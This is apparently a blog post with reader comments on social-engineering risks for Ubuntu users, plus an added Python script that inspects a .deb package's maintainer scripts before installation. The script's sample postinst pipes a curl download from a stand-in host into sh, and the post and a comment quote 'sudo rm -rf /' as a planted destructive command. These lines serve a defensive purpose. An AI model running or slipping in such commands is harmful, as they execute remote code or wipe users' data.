Why Ubuntu and Too Much Trust Can Be Bad
One of desktop Linux’s chief selling points is its near-immunity to malware. Whether this superiority is due to the Unix security measures that Windows lacks, or to the mere fact that comparatively few people use Linux on desktop computers, it makes Linux attractive in an era when all manner of nasty things can be done to computer users by exploiting bugs in the software they run. While Linux may not suffer from the software vulnerabilities of Windows, however, its users are still threatened by attacks that employ social-engineering—that is, those that dupe users into compromising their systems by running code or installing software without understanding the consequences.
Indeed, on a platform like Ubuntu, where the relationship between users and developers is defined by trust and presumed goodwill rather than financial exchange and a corporate EULA, the opportunities for social engineering are perhaps more abundant than they are under proprietary systems.
The cons of community support
When users have trouble with Ubuntu, the vast majority turn to community-based resources like the Ubuntu forums or documentation wiki. In many cases, at least in my experience, this method is a lot more effective and rewarding than making a call to an outsourced technical-support center and being put on hold indefinitely.
At the same time, malicious individuals thrive in community-based support channels. Even in those that are well policed, like the Ubuntu forums, novice users run the risk of being told to install bad software or to run destructive commands such as sudo rm -rf / (which deletes the entire filesystem).
‘Open-source’ doesn’t always mean ‘plays nicely’
The fact that almost all software on Ubuntu is free presents another opportunity for social-engineering attacks.
On Windows, I’m always cautious about installing free applications, because I know that in the Windows world, developers generally work for money. If they don’t make money by selling their software, they probably do it some other, potentially destructive way. I thus think twice before running an installer that I downloaded for free, and for which no source code is available.
Most of the software that I use on Ubuntu, in contrast, is developed by people working for free, who share their work in the hope that it will benefit others, not to make money. I’m consequently much more relaxed about installing software on Ubuntu, even if it’s in a third-party repository. Because trust is central to the model upon which Ubuntu is developed, I subconsciously assume the best about the intentions of people who develop applications for Linux.
I’ve yet to have my Ubuntu system compromised through this trust. But the assumptions of goodwill that Ubuntu encourages among its users present opportunities for exploitation that don’t exist in the proprietary world.
Even if software is open-source, I’m hardly qualified to check the code myself to ensure that it’s not malicious. There’s also no guarantee that pre-compiled .deb packages are built from the benign code that they purport.
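Checking the code is out of reach for most users, but checking what a pre-compiled package will actually do on installation is not. The script below is an added example, not code from the original post or from Ubuntu: it parses a .deb with nothing but the Python standard library (a .deb is an ar archive holding debian-binary, a control tarball with the package metadata and the preinst/postinst/prerm/postrm maintainer scripts that dpkg runs as root, and a data tarball with the files that land on disk) and summarises the scripts it would run and the files it would install. The sample package is constructed in memory, the package name and maintainer address are made up, and the "fetches from network" flag is a crude string heuristic assumed here for illustration, not a malware detector.

```python
"""Inspect a .deb before installing it (added example, not from the original post)."""
import hashlib
import io
import tarfile

AR_MAGIC = b"!<arch>\n"
MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")
# Crude, assumed heuristic: does a maintainer script pull code from the network?
NETWORK_HINTS = (b"curl ", b"wget ", b"| sh", b"| bash")


def parse_ar(blob: bytes) -> dict:
    """Parse a common-format ar archive into {member name: bytes}."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    members, pos = {}, len(AR_MAGIC)
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]  # 60-byte fixed header per member
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar member header")
        name = hdr[0:16].decode("ascii").rstrip(" ").rstrip("/")
        size = int(hdr[48:58].decode("ascii").strip())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)  # members are padded to an even offset
    return members


def _tar_entries(tarball: bytes) -> dict:
    """Return {path: bytes} for regular files (None for directories) in a tarball."""
    entries = {}
    with tarfile.open(fileobj=io.BytesIO(tarball), mode="r:*") as tf:
        for m in tf.getmembers():
            name = m.name[2:] if m.name.startswith("./") else m.name
            entries[name] = tf.extractfile(m).read() if m.isfile() else None
    return entries


def inspect_deb(blob: bytes) -> dict:
    """Summarise what a .deb would run (maintainer scripts) and install (data files)."""
    members = parse_ar(blob)
    if members.get("debian-binary", b"").strip() != b"2.0":
        raise ValueError("missing or unsupported debian-binary member")
    control = _tar_entries(next(v for k, v in members.items() if k.startswith("control.tar")))
    data = _tar_entries(next(v for k, v in members.items() if k.startswith("data.tar")))
    fields = dict(
        line.split(": ", 1)
        for line in control.get("control", b"").decode("utf-8", "replace").splitlines()
        if ": " in line
    )
    scripts = {
        s: {"lines": control[s].count(b"\n"),
            "fetches_from_network": any(h in control[s] for h in NETWORK_HINTS)}
        for s in MAINTAINER_SCRIPTS if control.get(s) is not None
    }
    return {
        "package": fields.get("Package"),
        "version": fields.get("Version"),
        "sha256": hashlib.sha256(blob).hexdigest(),  # compare with the repository's Packages index
        "maintainer_scripts": scripts,
        "data_files": sorted(p for p, body in data.items() if body is not None),
    }


def _write_ar(members) -> bytes:
    """Serialise [(name, bytes), ...] as an ar archive (only used to build the sample)."""
    out = bytearray(AR_MAGIC)
    for name, data in members:
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{0o100644:<8o}{len(data):<10}".encode("ascii")
        out += b"`\n" + data + (b"\n" if len(data) % 2 else b"")
    return bytes(out)


def _tar_gz(files) -> bytes:
    """Pack {path: bytes} into an in-memory gzip tarball."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, body in files.items():
            info = tarfile.TarInfo(name)
            info.size, info.mode = len(body), 0o755
            tf.addfile(info, io.BytesIO(body))
    return buf.getvalue()


def build_sample_deb(postinst: bytes) -> bytes:
    """Constructed sample package (made-up name and maintainer) with the given postinst."""
    control = (b"Package: example-tool\nVersion: 1.0-1\nArchitecture: all\n"
               b"Maintainer: Example <nobody@example.invalid>\nDescription: constructed sample\n")
    return _write_ar([
        ("debian-binary", b"2.0\n"),
        ("control.tar.gz", _tar_gz({"./control": control, "./postinst": postinst})),
        ("data.tar.gz", _tar_gz({"./usr/bin/example-tool": b"#!/bin/sh\necho hello\n"})),
    ])


if __name__ == "__main__":
    for label, script in (("benign", b"#!/bin/sh\nset -e\nexit 0\n"),
                          ("suspicious", b"#!/bin/sh\ncurl -s http://example.invalid/p | sh\n")):
        print(label, inspect_deb(build_sample_deb(script)))
```

Running the file prints one summary per constructed sample: the benign package has a three-line postinst and installs a single file, while the second one's postinst is flagged because it downloads and executes something at install time, which is exactly the "does more than advertised" case the post describes. The sha256 field exists so the value can be compared with what a repository's signed Packages index publishes for that file; the inspection shows what a package would do, it does not replace a signed repository.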
Attacks like these are perhaps most troubling because they require few technical skills on the part of malicious individuals. No one needs to know how to exploit a buffer overflow and execute arbitrary code; they just need to convince an Ubuntu user with her guard down that she should run a Debian package that does more than advertised.
This isn’t to say that Ubuntu users should trust each other any less. But we should be aware of the risks that come with openness and freedom, in order to prevent a malevolent few from exploiting the trust upon which the Ubuntu community is founded.
For the time being, Ubuntu and Linux are still safer by far than Windows and even OS X. But as the market share of desktop Linux increases, attackers may well find that the assumptions of beneficence inherent to the free-software world open up opportunities for social engineering on a scale unprecedented under proprietary platforms.
WorksWithU Contributing Blogger Christopher Tozzi is a PhD student at a major U.S. university. Tozzi has extensive hands-on experience with Ubuntu Server Edition and Ubuntu Desktop Edition.
I don’t think Linux users should worry about more than other OS users.
Stupid users are OS independent 😉
Quote:
On Windows, I’m always cautious about installing free applications, because I know that in the Windows world, developers generally work for money. If they don’t make money by selling their software, they probably do it some other, potentially destructive way. I thus think twice before running an installer that I downloaded for free, and for which no source code is available.
End Quote
You are the first Windows user I’ve encountered that acts and thinks in this way 😀
Generally Windows users have the tendency to install everything they find on the internet without checking what they are installing…think about cracks of software and games…Oh, and I don’t think Win free software developers are that evil and money obsessed 😀
Never when installing free software on Windows have I ever been so paranoid about a single piece of software or thought to myself “oh, this Windows software is strangely free, I better be careful”. Unsurprisingly I’ve never thought like that when installing software on Ubuntu either.
What I have thought about is the source of that software. Where did it come from? Which company is behind it? Who’s backing it? Have I heard of it before? Asking these questions helps me determine its trustworthiness. Not the price tag.
Social engineering is more of a problem on the web rather than a specific OS or platform. It’s something that technology can’t really protect us from. It’s something that we as users must be aware of and try to avoid. As the old saying goes “if it’s too good to be true, it probably is”.
So don’t open e-mails from Nigerian business men trying to shift their lottery winnings out of the country. And if you win any competitions you should never need to stump up a fee to collect your prize. Your bank will also never ever ask for your full account or even partial details via e-mail.
First off your headline is misleading. It should read Linux. Ubuntu is not the same as Linux and vice versa. The things that you write about would apply to any distro.
Secondly, it is a crock. Unlike in the Windows world, repositories are maintained. Package maintainers are carefully screened and they must be invited to do the job. It is quite a privilege, as it is an exclusive group.
Thirdly, the behaviour that you are fearful of is strictly Windows behaviour and does not apply to Linux users. Most Linux users do not install DEBs or RPMs willy-nilly from the internet. Most users rely on only the repositories and sites such as GETDEB.net which again are maintained. Any Linux user who deviates from this practice is more likely to break their package manager than invite disaster from malware and other Windows problems.
This column underscores the difference between Linux users and also shows the danger in trying to apply the habits of one group of user to another. Your argument is based on the false premise that Linux users have Windows habits. They don’t.
I’m a system admin. I mainly work on MS servers/workstations. I can tell you from the stuff that I have to clean off of computers all of the time, that the users that don’t read in Windows, are not going to read in Linux.
These users will not switch to Linux because it is not point and click so much. Still a lot of the fixes are CLI driven. This will keep most dumb users away from Linux anyway.
In life there are 3 types of people. Those that drive a manual. Those that drive an automatic. Those that drive an automatic, but know how to drive a manual but are lazy. Of these 3, only 2 would be considered good computer users. The 1, no matter what system they are on, will be stupid and not really know how anything works, because they enjoy the bliss too much.
LinuxCanuck: At the moment, MOST switchers are if not full nerds, semi-nerds, so they understand how viruses work and are usually the people that won’t install Bear Share on their Windows PC. But when little Johnny gets his Dell Mini on Christmas, or I wipe my cousin’s computer and put Ubuntu on it (with my own OEM version ;)) and she gets an Instant Message from a friend that says “to view this Smiley you need smileycenteral”, she WILL click that link. If there is an easily installable .deb to download and run, there WILL be problems. Ubuntu/Linux in general is A LOT more powerful than Windows, and the damage that can be done not only to your machine but also to other machines on your network, etc. is a BIG issue.
Another example is if you are just learning how to mess with your machine and want to fix things on your own. You will hit up the forums or Google, and the site you come upon could be some a*hole who, in the middle of his step-by-step instructions, at let’s say point #7, puts something like: #7. In the terminal type “sudo rm -rf /” or “sudo rm -rf ~”, just to be a prick. Just because right now it’s not happening (as often) does not mean that when Linux has 80% market share, it won’t. There will be a lot more reasons to do it, and a lot more idiots (or regular Joes) to try it out. The biggest cure is to not let my cousin administer her own system and tell her to call me when she needs a new app or something, then ssh into her machine from home or the G1 and “sudo apt-get install”.
I agree with Mouseclone.
Why has no Linux hater ever written a Linux virus, just to prove that we, Linux adepts, have no reason to feel safe? Because it is impossible, of course…
Linux viruses do exist. There’s just nowhere near as many of them as there are Windows viruses. While anti-virus software for Linux also exists, the Linux approach to virus protection is very different from the Microsoft approach.
In the Linux world we try to prevent infection rather than simply cure it. Security to Linux is an integral part of the development strategy. Not a bolt on extra.
@LinuxCanuck: Repositories are indeed maintained. So well maintained the Debian project recently accidentally introduced a critical flaw to some code vital for security. Even if people don’t have any malicious intent we need to know they can be trusted before we sign up to their repo.
We also have to remember anybody can create a repository. All people with malicious intent need to do is set up a bogus FOSS project and start getting people to add the repo to their sources list for automatic updates. Once you have a decent user base you introduce the rogue code and trigger it before anybody notices it’s there.
Many Linux users would be caught with their pants down with such a scheme. It’s not difficult to con your way past people’s defences. The social engineering Christopher Tozzi talks about used to be known as blagging.
“I’ve yet to have my Ubuntu system compromised through this trust. But the assumptions of goodwill that Ubuntu encourages among its users present opportunities for exploitation that don’t exist in the proprietary world.”
Oh yes it does, it’s just less justifiable. It is that casual trust that has made propagation so much easier. Perhaps it could be better explained as unknowing, or unbelieving, but it is ultimately trust.
Otherwise, good job. Since I usually end any discussion of malware avoidance with noting that the best avoidance to be had–short of unplugging–is an OS OS like Ubuntu, I always tell prospective users that staying within the main repositories is the best way to avoid issues. And that should be the mantra whenever one promotes any Linux distro to the uninitiated as a more secure OS.
Personally I’d suggest simply educating people about these issues is the best way to deal with it. Mollycoddling and wrapping people in the cotton wool of Windows with anti-virus, anti-spyware, anti-trojan, anti-user (Windows Vista UAC) has actually encouraged ignorance of on-line dangers to perpetuate.
Encouraging people to educate themselves about these issues is a no brainer. I’m betting everybody posting here is pretty much self educated about these issues.
At some point someone exposed you to the concept of security in IT environments and you decided to find out more. People should be encouraged to tackle security head on and not avoid it.
If we all lived in bubbles we’d never develop healthy immune systems to protect us. Unfortunately bubbles tend to burst. Risk is all a part of the game. People need to learn how to weigh up the risks. That way we all benefit. Linux users, Windows users, Mac users and UNIX users. We’re all in it together.